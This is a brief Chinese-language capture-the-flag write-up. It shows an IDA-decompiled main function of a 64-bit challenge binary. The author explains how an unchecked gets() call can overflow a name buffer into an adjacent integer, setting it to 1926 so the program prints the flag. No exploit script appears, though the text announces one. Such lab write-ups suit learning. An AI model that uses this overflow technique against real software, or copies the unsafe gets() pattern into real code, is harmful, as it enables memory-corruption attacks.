下完放Linux看看
一看这是个64位,且有金丝雀保护
放进ipa64看看
F5一下
_int64 __fastcall main(int a1, char **a2, char **a3)
{
__int64 result; // rax
char v4[8]; // [rsp+0h] [rbp-20h] BYREF
unsigned int v5[4]; // [rsp+8h] [rbp-18h] BYREF
unsigned __int64 v6; // [rsp+18h] [rbp-8h]
v6 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("What's Your Birth?");
__isoc99_scanf("%d", v5);
while ( getchar() != 10 )
;
if ( v5[0] == 1926 )
{
puts("You Cannot Born In 1926!");
result = 0LL;
}
else
{
puts("What's Your Name?");
gets(v4);
printf("You Are Born In %d\n", v5[0]);
if ( v5[0] == 1926 )
{
puts("You Shall Have Flag.");
system("cat flag");
}
else
{
puts("You Are Naive.");
puts("You Speed One Second Here.");
}
result = 0LL;
}
return result;
}一看有一个gets函数 ,注意gets函数基本上都是漏洞所在
看看v4的地址和栈
可见v4和v5之间差了(0x20-0x18)
分析一下可知 当v5是1926时程序结束,但是只有v5=1926才能得到flag,矛盾
此题关键在于用v4给v5二次赋值
开始写脚本
cat flag